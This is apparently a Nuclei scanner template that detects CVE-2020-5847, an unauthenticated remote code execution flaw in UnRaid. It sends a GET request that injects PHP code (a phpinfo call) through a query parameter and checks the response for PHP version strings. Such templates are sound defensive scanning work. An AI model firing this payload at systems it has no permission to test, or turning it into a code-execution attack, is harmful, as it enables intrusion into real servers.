30 lines
873 B
YAML
30 lines
873 B
YAML
id: CVE-2020-5847
|
|
info:
|
|
name: UnRaid Remote Code Execution
|
|
author: madrobot
|
|
severity: critical
|
|
description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code.
|
|
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
|
|
tags: cve,cve2020,rce
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2020-5847
|
|
cwe-id: CWE-94,CWE-668
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "PHP Extension"
|
|
- "PHP Version"
|
|
condition: and
|